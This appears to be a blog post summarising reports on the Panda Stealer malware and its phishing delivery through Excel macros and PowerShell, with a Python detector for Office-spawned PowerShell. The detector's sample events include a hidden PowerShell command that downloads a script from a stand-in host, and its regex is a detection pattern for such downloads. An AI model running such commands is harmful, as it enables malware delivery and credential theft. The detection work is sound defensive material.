Panda attacks on crypto wallets

I’m not talking about attacks by a cuddly black and white bear from China, but instead a series of new ransomware attacks. The ‘Panda’ malware has been targeting cryptocurrency wallets, “along with account credentials from other applications such as NordVPN, Telegram, Discord and Steam,” according to a Coindesk report.

Trend Micro, a cybersecurity company, discovered the information-stealing malware and dubbed it ‘Panda Stealer’. The malware has been found targeting individuals across countries including the US, Australia, Japan, and Germany.

The malware begins its infection chain through phishing emails that pretend to be business quote requests.

According to ZDNet, two methods have been linked to the campaign. The first uses attached .XLSM documents that require victims to enable malicious macros. If macros are permitted, a loader then downloads and executes the main stealer.

In the second method, “an attached .XLS file contains an Excel formula that hides a PowerShell command. This command attempts to access a URL to pull a PowerShell script to the victim’s system and to then grab a fileless payload.”
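Both delivery methods end with Excel launching a script interpreter that reaches out to a URL, so process lineage is a practical place to detect them. The following is an added example, not code from the article or from Trend Micro: it walks constructed process-creation events (field names are assumptions modelled on Sysmon Event ID 1) and flags any PowerShell process that has an Office application among its ancestors, raising the severity when the command line suggests a download or encoded command.

```python
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command-line hints that the shell is fetching or decoding a second stage.
FETCH = re.compile(r"https?://|downloadstring|invoke-webrequest|invoke-expression|-enc", re.I)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events (fields modelled on Sysmon Event ID 1).
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": r'EXCEL.EXE "C:\Users\a\Downloads\quote_request.xlsm"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c powershell ..."},
    {"pid": 400, "ppid": 300, "image": PS,
     "cmd": "powershell.exe -w hidden Invoke-WebRequest http://example.invalid/s.ps1"},
    {"pid": 500, "ppid": 100, "image": PS, "cmd": "powershell.exe Get-ChildItem"},
    {"pid": 700, "ppid": 200, "image": PS, "cmd": "powershell.exe -NoProfile -Command Get-Date"},
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def office_ancestor(pid, by_pid):
    """Walk parent links from pid; return the first Office process found, else None."""
    seen = set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against PID-reuse loops
        seen.add(pid)
        if basename(by_pid[pid]["image"]) in OFFICE:
            return by_pid[pid]
        pid = by_pid[pid]["ppid"]
    return None

def detect(events):
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        anc = office_ancestor(e["ppid"], by_pid)
        if anc is not None:
            sev = "high" if FETCH.search(e["cmd"]) else "medium"
            alerts.append({"pid": e["pid"], "office_pid": anc["pid"], "severity": sev})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Walking the full ancestry rather than only the direct parent catches the case where Excel starts `cmd.exe` first, while PowerShell started from Explorer (pid 500) is left alone.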

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH).

Trend Micro researchers who discovered the attack said, “Crypto wallets are now as big of a target for online theft as banking accounts are. With more people getting into cryptocurrencies and the values of said cryptocurrencies still increasing, this will only become a greater threat moving forward.”

They also pointed out that there is more risk here because, unlike theft via a bank or a credit card, there may not be a central authority that can undo malicious transactions. Once you lose your money and the transaction goes on the blockchain, it’s likely gone forever.

“None of this is particularly novel in and of itself – malicious Office documents are well known, so is fileless loading,” Trend Micro researchers said. “The main “new” aspect here is the target of the data theft.” For example, attackers are setting their sights on applications like Discord and Telegram – popular communications platforms for cryptocurrency communities. 

Even if this type of attack is new, Trend Micro recommends following standard security practices: not opening attachments sent via email, not clicking on unknown links, and keeping software up to date are still basic measures people can take to avoid malware and other security breaches. They added that the best advice is to secure your cryptocurrency wallets and recommended using strong, unique passwords, and commented, “For investors who are more interested in holding cryptocurrencies for the long term instead of actively trading them, the use of hardware-based/offline wallets may well be safer, if less convenient to add to or sell from.”
